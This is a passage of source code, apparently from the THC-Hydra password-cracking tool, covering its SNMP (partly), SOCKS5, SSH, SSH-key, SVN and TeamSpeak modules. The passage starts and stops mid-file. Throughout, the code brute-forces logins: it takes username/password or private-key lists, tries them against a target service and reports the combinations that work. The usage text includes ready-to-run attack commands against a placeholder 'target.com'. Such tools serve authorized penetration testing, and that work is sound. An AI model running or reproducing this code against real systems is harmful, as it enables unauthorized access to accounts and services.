connect and service init function */\n next_run = start_snmp(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_snmp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_snmp(const char *service) {\n printf(\"Module snmp is optionally taking the following parameters:\\n\"\n \" READ perform read requests (default)\\n\"\n \" WRITE perform write requests\\n\"\n \" 1 use SNMP version 1 (default)\\n\"\n \" 2 use SNMP version 2\\n\"\n \" 3 use SNMP version 3\\n\"\n \" Note that SNMP version 3 usually uses both login and \"\n \"passwords!\\n\"\n \" SNMP version 3 has the following optional sub parameters:\\n\"\n \" MD5 use MD5 authentication (default)\\n\"\n \" SHA use SHA authentication\\n\"\n \" DES use DES encryption\\n\"\n \" AES use AES encryption\\n\"\n \" if no -p/-P parameter is given, SNMPv3 noauth is performed, \"\n \"which\\n\"\n \" only requires a password (or username) not both.\\n\"\n \"To combine the options, use colons (\\\":\\\"), e.g.:\\n\"\n \" hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ target.com snmp\\n\"\n \" hydra -P pass.txt -m 2 target.com snmp\\n\");\n}\n" }, { "path": "hydra-socks5.c", "content": "#include \"hydra-mod.h\"\n\n/*\n\nRFC: 1928\nThis module enable bruteforcing for socks5, only following types are supported:\n0x00 \"No Authentication Required\"\n0x02 \"Username/Password\"\n\n*/\n\nextern char *HYDRA_EXIT;\nunsigned char *buf;\n\nint32_t fail_cnt;\n\nint32_t start_socks5(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[300];\n int32_t pport, fud = 0;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memcpy(buffer, \"\\x05\\x02\\x00\\x02\", 4);\n if (hydra_send(s, buffer, 4, 0) < 0) {\n return 1;\n }\n if ((buf = (unsigned char *)hydra_receive_line(s)) == NULL) {\n fail_cnt++;\n if (fail_cnt >= 10)\n return 5;\n return (1);\n }\n\n fail_cnt = 0;\n if (buf[0] != 5) {\n if (buf[0] == 4) {\n hydra_report(stderr, \"[ERROR] Sorry Socks4 / Socks4a ident is not supported\\n\");\n } else {\n hydra_report(stderr, \"[ERROR] Socks5 protocol or service shutdown: %s\\n\", buf);\n }\n free(buf);\n return (4);\n }\n if (buf[1] == 0 || buf[1] == 32) {\n hydra_report(stderr, \"[INFO] Socks5 server does NOT require any authentication!\\n\");\n free(buf);\n return (4);\n }\n if (buf[1] != 0x2) {\n hydra_report(stderr, \"[ERROR] Socks5 protocol or service shutdown: %s\\n\", buf);\n free(buf);\n return (4);\n }\n free(buf);\n\n /* RFC 1929\n For username/password authentication the client's authentication request is\n field 1: version number, 1 byte (must be 0x01)\n */\n snprintf(buffer, sizeof(buffer), \"\\x01%c%s%c%s\", (char)strlen(login), login, (char)strlen(pass), pass);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n\n if ((buf = (unsigned char *)hydra_receive_line(s)) == NULL)\n return (1);\n\n if (buf[1] != 255) {\n /* new: false positive check */\n free(buf);\n pport = htons(port);\n if (ip[0] == 16) {\n memcpy(buffer, \"\\x05\\x01\\x00\\x04\", 4);\n memcpy(buffer + 4, &ip[1], 16);\n memcpy(buffer + 20, &pport, 2);\n hydra_send(s, buffer, 22, 0);\n } else {\n memcpy(buffer, \"\\x05\\x01\\x00\\x01\", 4);\n memcpy(buffer + 4, &ip[1], 4);\n memcpy(buffer + 8, &pport, 2);\n hydra_send(s, buffer, 10, 0);\n }\n if ((buf = (unsigned char *)hydra_receive_line(s)) != NULL) {\n if (buf[1] == 0 || buf[1] == 32) {\n hydra_report_found_host(port, ip, \"socks5\", fp);\n hydra_completed_pair_found();\n fud = 1;\n } else if (buf[1] != 2) {\n hydra_report_found_host_msg(port, ip, \"socks5\", fp, \"might be a false positive!\");\n }\n }\n }\n if (buf != NULL)\n free(buf);\n if (fud == 0)\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_socks5(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_SOCKS5, mysslport = PORT_SOCKS5_SSL;\n\n hydra_register_socket(sp);\n if (port != 0)\n myport = port;\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_socks5(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n case 5: /* clean exit, server may blocking connections */\n hydra_report(stderr, \"[ERROR] Server may blocking connections\\n\");\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_socks5_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-ssh.c", "content": "/*\n\nlibssh is available at http://www.libssh.org\nIf you want support for ssh v1 protocol, you\nhave to add option -DWITH_SSH1=On in the cmake\n\n*/\n\n#include \"hydra-mod.h\"\n#ifndef LIBSSH\nvoid dummy_ssh() { printf(\"\\n\"); }\n#else\n\n#include \n\n#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4\n\nssh_session session = NULL;\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nint32_t new_session = 1;\n\nint32_t start_ssh(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, keep_login[300];\n int32_t auth_state = 0, rc = 0, i = 0;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n if (new_session) {\n if (session) {\n ssh_disconnect(session);\n // ssh_finalize();\n ssh_free(session);\n } else {\n ssh_init();\n }\n\n session = ssh_new();\n ssh_options_set(session, SSH_OPTIONS_PORT, &port);\n ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));\n ssh_options_set(session, SSH_OPTIONS_USER, login);\n ssh_options_set(session, SSH_OPTIONS_TIMEOUT, &hydra_options.waittime);\n ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, \"none\");\n ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, \"none\");\n // might be better to add the legacy (first two for KEX and HOST) to the default instead of specifying the full list\n ssh_options_set(session, SSH_OPTIONS_KEY_EXCHANGE, \"diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256\");\n ssh_options_set(session, SSH_OPTIONS_HOSTKEYS, \"ssh-rsa,ssh-dss,ssh-ed25519,ecdsa-sha2-nistp521,ecdsa-sha2-nistp384,ecdsa-sha2-nistp256,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256\");\n if (ssh_connect(session) != 0) {\n // if the connection was drop, exit and let hydra main handle it\n if (verbose)\n hydra_report(stderr, \"[ERROR] could not connect to target port %d: %s\\n\", port, ssh_get_error(session));\n return 3;\n }\n\n if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) {\n return 3;\n } else if (rc == SSH_AUTH_SUCCESS) {\n hydra_report_found_host(port, ip, \"ssh\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n else\n return 1;\n }\n } else\n new_session = 1;\n\n auth_state = ssh_auth_list(session);\n if ((auth_state & SSH_AUTH_METHOD_PASSWORD) > 0) {\n auth_state = ssh_userauth_password(session, NULL, pass);\n } else if ((auth_state & SSH_AUTH_METHOD_INTERACTIVE) > 0) {\n auth_state = ssh_userauth_kbdint(session, NULL, NULL);\n while (auth_state == SSH_AUTH_INFO) {\n rc = ssh_userauth_kbdint_getnprompts(session);\n for (i = 0; i < rc; i++)\n ssh_userauth_kbdint_setanswer(session, i, pass);\n auth_state = ssh_userauth_kbdint(session, NULL, NULL);\n }\n } else {\n return 4;\n }\n\n if (auth_state == SSH_AUTH_ERROR || !ssh_is_connected(session)) {\n new_session = 1;\n return 1;\n }\n\n if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) {\n hydra_report_found_host(port, ip, \"ssh\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n } else {\n strncpy(keep_login, login, sizeof(keep_login) - 1);\n keep_login[sizeof(keep_login) - 1] = '\\0';\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n login = hydra_get_next_login();\n if (strcmp(login, keep_login) == 0)\n new_session = 0;\n return 1;\n }\n\n /* not reached */\n return 1;\n}\n\nvoid service_ssh(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n next_run = start_ssh(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 2:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n hydra_child_exit(0);\n break;\n case 3:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n if (verbose)\n fprintf(stderr, \"[ERROR] ssh protocol error\\n\");\n hydra_child_exit(2);\n break;\n case 4:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n fprintf(stderr, \"[ERROR] ssh target does not support password auth\\n\");\n hydra_child_exit(2);\n break;\n default:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n#else\n#error \"You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support\"\n#endif\n#endif\n\n//\n// dirty workaround here: miscptr is the ptr to the logins, and the first one is\n// used to test if password authentication is enabled!!\n//\nint32_t service_ssh_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // 1 skip target without generating an error\n // 2 skip target because of protocol problems\n // 3 skip target because its unreachable\n#ifdef LIBSSH\n int32_t rc, method;\n ssh_init();\n ssh_session session = ssh_new();\n\n if (verbose || debug)\n printf(\"[INFO] Testing if password authentication is supported by \"\n \"ssh://%s@%s:%d\\n\",\n miscptr == NULL ? \"hydra\" : miscptr, hydra_address2string_beautiful(ip), port);\n ssh_options_set(session, SSH_OPTIONS_PORT, &port);\n ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));\n if (miscptr == NULL)\n ssh_options_set(session, SSH_OPTIONS_USER, \"hydra\");\n else\n ssh_options_set(session, SSH_OPTIONS_USER, miscptr);\n ssh_options_set(session, SSH_OPTIONS_TIMEOUT, &hydra_options.waittime);\n ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, \"none\");\n ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, \"none\");\n // might be better to add the legacy (first two for KEX and HOST) to the default instead of specifying the full list\n ssh_options_set(session, SSH_OPTIONS_KEY_EXCHANGE, \"diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256\");\n ssh_options_set(session, SSH_OPTIONS_HOSTKEYS, \"ssh-rsa,ssh-dss,ssh-ed25519,ecdsa-sha2-nistp521,ecdsa-sha2-nistp384,ecdsa-sha2-nistp256,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256\");\n if (ssh_connect(session) != 0) {\n fprintf(stderr, \"[ERROR] could not connect to ssh://%s:%d - %s\\n\", hydra_address2string_beautiful(ip), port, ssh_get_error(session));\n return 2;\n }\n rc = ssh_userauth_none(session, NULL);\n method = ssh_userauth_list(session, NULL);\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n\n if (debug)\n printf(\"[DEBUG] SSH method check: %08x\\n\", method);\n\n if ((method & SSH_AUTH_METHOD_INTERACTIVE) || (method & SSH_AUTH_METHOD_PASSWORD)) {\n if (verbose || debug)\n printf(\"[INFO] Successful, password authentication is supported by \"\n \"ssh://%s:%d\\n\",\n hydra_address2string_beautiful(ip), port);\n return 0;\n } else if (method == 0) {\n if (verbose || debug)\n fprintf(stderr,\n \"[WARNING] invalid SSH method reply from ssh://%s:%d, continuing \"\n \"anyway ... (check for empty password!)\\n\",\n hydra_address2string_beautiful(ip), port);\n return 0;\n }\n\n fprintf(stderr,\n \"[ERROR] target ssh://%s:%d/ does not support password \"\n \"authentication (method reply %d).\\n\",\n hydra_address2string_beautiful(ip), port, method);\n return 1;\n#else\n return 0;\n#endif\n}\n" }, { "path": "hydra-sshkey.c", "content": "\n/*\n libssh is available at http://www.libssh.org\n current version is 0.4.8\n If you want support for ssh v1 protocol, you\n have to add option -DWITH_SSH1=On in the cmake\n*/\n\n#include \"hydra-mod.h\"\n#ifndef LIBSSH\nvoid dummy_sshkey() { printf(\"\\n\"); }\n#else\n\n#include \n\n#if LIBSSH_VERSION_MAJOR >= 0 && LIBSSH_VERSION_MINOR >= 4\n\nextern ssh_session session;\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nextern int32_t new_session;\n\nint32_t start_sshkey(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *key, keep_login[300];\n int32_t auth_state = 0, rc = 0;\n ssh_private_key privkey;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(key = hydra_get_next_password()) == 0)\n key = empty;\n\n if (new_session) {\n if (session) {\n ssh_disconnect(session);\n ssh_free(session);\n } else {\n ssh_init();\n }\n\n session = ssh_new();\n ssh_options_set(session, SSH_OPTIONS_PORT, &port);\n ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));\n ssh_options_set(session, SSH_OPTIONS_USER, login);\n ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, \"none\");\n ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, \"none\");\n if (ssh_connect(session) != 0) {\n // if the connection was drop, exit and let hydra main handle it\n if (verbose)\n hydra_report(stderr, \"[ERROR] could not connect to target port %d\\n\", port);\n return 3;\n }\n\n if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) {\n return 3;\n } else if (rc == SSH_AUTH_SUCCESS) {\n hydra_report_found_host(port, ip, \"sshkey\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n else\n return 1;\n }\n } else\n new_session = 1;\n\n auth_state = ssh_auth_list(session);\n if ((auth_state & SSH_AUTH_METHOD_PUBLICKEY) > 0) {\n privkey = privatekey_from_file(session, key, 0, NULL);\n if (!privkey) {\n hydra_report(stderr, \"[ERROR] skipping invalid private key: \\\"%s\\\"\\n\", key);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n\n return 1;\n }\n auth_state = ssh_userauth_pubkey(session, NULL, NULL, privkey);\n } else {\n return 4;\n }\n\n if (auth_state == SSH_AUTH_ERROR) {\n new_session = 1;\n return 1;\n }\n\n if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) {\n hydra_report_found_host(port, ip, \"sshkey\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n } else {\n strncpy(keep_login, login, sizeof(keep_login) - 1);\n keep_login[sizeof(keep_login) - 1] = '\\0';\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n login = hydra_get_next_login();\n if (strcmp(login, keep_login) == 0)\n new_session = 0;\n return 1;\n }\n\n /* not reached */\n return 1;\n}\n\nvoid service_sshkey(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n next_run = start_sshkey(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 2:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n hydra_child_exit(0);\n break;\n case 3:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n fprintf(stderr, \"[ERROR] ssh protocol error\\n\");\n hydra_child_exit(2);\n break;\n case 4:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n fprintf(stderr, \"[ERROR] ssh target does not support pubkey auth\\n\");\n hydra_child_exit(2);\n break;\n default:\n ssh_disconnect(session);\n ssh_finalize();\n ssh_free(session);\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n#else\n#error \"You are not using at least v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support\"\n#endif\n#endif\n\nint32_t service_sshkey_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_sshkey(const char *service) {\n printf(\"Module sshkey does not provide additional options, although the \"\n \"semantic for\\n\"\n \"options -p and -P is changed:\\n\"\n \" -p expects a path to an unencrypted private key in PEM format.\\n\"\n \" -P expects a filename containing a list of path to some unencrypted\\n\"\n \" private keys in PEM format.\\n\\n\");\n}\n" }, { "path": "hydra-svn.c", "content": "// This plugin was written by \n// checked for memleaks on 110425, none found\n\n#ifdef LIBSVN\n\n/* needed on openSUSE */\n#ifndef _GNU_SOURCE\n#define _GNU_SOURCE\n#endif\n\n#if !defined PATH_MAX && defined HAVE_SYS_PARAM_H\n#include \n#endif\n\n#include \n#include \n#include \n#include \n#include \n#include \n#if SVN_VER_MINOR > 7\n#include \n#endif\n\n#endif\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBSVN\nvoid dummy_svn() { printf(\"\\n\"); }\n#else\n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\n\n#define DEFAULT_BRANCH \"trunk\"\n\nstatic svn_error_t *print_dirdummy(void *baton, const char *path, const svn_dirent_t *dirent, const svn_lock_t *lock, const char *abs_path, apr_pool_t *pool) { return SVN_NO_ERROR; }\n\nstatic svn_error_t *my_simple_prompt_callback(svn_auth_cred_simple_t **cred, void *baton, const char *realm, const char *username, svn_boolean_t may_save, apr_pool_t *pool) {\n char *empty = \"\";\n char *login, *pass;\n svn_auth_cred_simple_t *ret = apr_pcalloc(pool, sizeof(*ret));\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n ret->username = apr_pstrdup(pool, login);\n ret->password = apr_pstrdup(pool, pass);\n\n *cred = ret;\n return SVN_NO_ERROR;\n}\n\nint32_t start_svn(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n // int32_t ipv6 = 0;\n char URL[1024];\n char URLBRANCH[256];\n#if SVN_VER_MINOR > 7\n const char *canonical;\n#endif\n apr_pool_t *pool;\n svn_error_t *err;\n svn_opt_revision_t revision;\n apr_uint32_t dirents;\n svn_client_ctx_t *ctx;\n svn_auth_provider_object_t *provider;\n apr_array_header_t *providers;\n\n if (miscptr)\n strncpy(URLBRANCH, miscptr, sizeof(URLBRANCH));\n else\n strncpy(URLBRANCH, DEFAULT_BRANCH, sizeof(URLBRANCH));\n\n if (svn_cmdline_init(\"hydra\", stderr) != EXIT_SUCCESS)\n return 4;\n\n // if (ip[0] == 16)\n // ipv6 = 1;\n\n pool = svn_pool_create(NULL);\n\n err = svn_config_ensure(NULL, pool);\n if (err) {\n svn_pool_destroy(pool);\n svn_handle_error2(err, stderr, FALSE, \"hydra: \");\n return 4;\n }\n\n#if SVN_VER_MINOR > 7\n if ((err = svn_client_create_context2(&ctx, NULL, pool))) {\n#else\n if ((err = svn_client_create_context(&ctx, pool))) {\n#endif\n svn_pool_destroy(pool);\n svn_handle_error2(err, stderr, FALSE, \"hydra: \");\n return 4;\n }\n\n if ((err = svn_config_get_config(&(ctx->config), NULL, pool))) {\n svn_pool_destroy(pool);\n svn_handle_error2(err, stderr, FALSE, \"hydra: \");\n return 4;\n }\n\n providers = apr_array_make(pool, 1, sizeof(svn_auth_provider_object_t *));\n\n svn_auth_get_simple_prompt_provider(&provider, my_simple_prompt_callback, NULL, /* baton */\n 0, pool);\n APR_ARRAY_PUSH(providers, svn_auth_provider_object_t *) = provider;\n\n /* Register the auth-providers into the context's auth_baton. */\n svn_auth_open(&ctx->auth_baton, providers, pool);\n\n revision.kind = svn_opt_revision_head;\n snprintf(URL, sizeof(URL), \"svn://%s:%d/%s\", hydra_address2string_beautiful(ip), port, URLBRANCH);\n dirents = SVN_DIRENT_KIND;\n#if SVN_VER_MINOR > 9\n canonical = svn_uri_canonicalize(URL, pool);\n err = svn_client_list4(canonical, &revision, &revision, NULL, svn_depth_unknown, dirents, FALSE, FALSE, (svn_client_list_func2_t)print_dirdummy, NULL, ctx, pool);\n#elif SVN_VER_MINOR > 7\n canonical = svn_uri_canonicalize(URL, pool);\n err = svn_client_list3(canonical, &revision, &revision, svn_depth_unknown, dirents, FALSE, FALSE, (svn_client_list_func2_t)print_dirdummy, NULL, ctx, pool);\n#else\nerr = svn_client_list2(URL, &revision, &revision, svn_depth_unknown, dirents, FALSE, print_dirdummy, NULL, ctx, pool);\n#endif\n\n svn_pool_destroy(pool);\n\n if (err) {\n if (debug || (verbose && (err->apr_err != 170001 && err->apr_err != 170013)))\n hydra_report(stderr, \"[ERROR] Access refused (error code %d) , message: %s\\n\", err->apr_err, err->message);\n // Username not found 170001 \": Username not found\"\n // Password incorrect 170001 \": Password incorrect\"\n if (err->apr_err != 170001 && err->apr_err != 170013) {\n return 4; // error\n } else {\n if (strstr(err->message, \"Username not found\")) {\n // if (verbose)\n // printf(\"[INFO] user %s does not exist, skipping\\n\", login);\n hydra_completed_pair_skip();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n } else {\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n }\n }\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Access granted\\n\");\n hydra_report_found_host(port, ip, \"svn\", fp);\n hydra_completed_pair_found();\n return 3;\n }\n return 3;\n}\n\nvoid service_svn(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_SVN, mysslport = PORT_SVN_SSL;\n\n hydra_register_socket(sp);\n\n while (1) {\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n next_run = 2;\n break;\n case 2:\n next_run = start_svn(sock, ip, port, options, miscptr, fp);\n if ((next_run == 1 || next_run == 2) && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n if (!verbose)\n hydra_report(stderr, \"[ERROR] Caught unknown return code, try verbose \"\n \"option for more details\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_svn_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n#ifdef LIBSVN\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] detected subversion library v%d.%d\\n\", SVN_VER_MAJOR, SVN_VER_MINOR);\n if (SVN_VER_MAJOR != 1 && SVN_VER_MINOR >= 5) {\n hydra_report(stderr, \"[ERROR] unsupported subversion library v%d.%d, exiting!\\n\", SVN_VER_MAJOR, SVN_VER_MINOR);\n return -1;\n }\n#endif\n return 0;\n}\n\nvoid usage_svn(const char *service) {\n printf(\"Module svn is optionally taking the repository name to attack, \"\n \"default is \\\"trunk\\\"\\n\\n\");\n}\n" }, { "path": "hydra-teamspeak.c", "content": "#include \"hydra-mod.h\"\n\n#ifdef HAVE_ZLIB\n#include \n#else\n#include \"crc32.h\"\n#endif\n\n/*\n\nThis module brings support for Teamspeak version 2.x (TS2 protocol)\nTested with version 2.0.r23.b19, server uses to ban ip for 10 min\nwhen bruteforce is detected.\n\nTS1 protocol (tcp/8765) is not supported\nTS3 protocol (udp/9987) is not needed as user/pass is not used anymore\n\n*/\n\nstruct team_speak {\n char header[16];\n unsigned long crc;\n char clientlen;\n char client[29];\n char oslen;\n char os[29];\n char misc[10];\n char userlen;\n char user[29];\n char passlen;\n char pass[29];\n char loginlen;\n char login[29];\n};\n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern char *HYDRA_EXIT;\n\nint32_t start_teamspeak(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n char buf[100];\n struct team_speak teamspeak;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memset(&teamspeak, 0, sizeof(struct team_speak));\n\n memcpy(&teamspeak.header, \"\\xf4\\xbe\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\", 16);\n\n teamspeak.clientlen = 9;\n 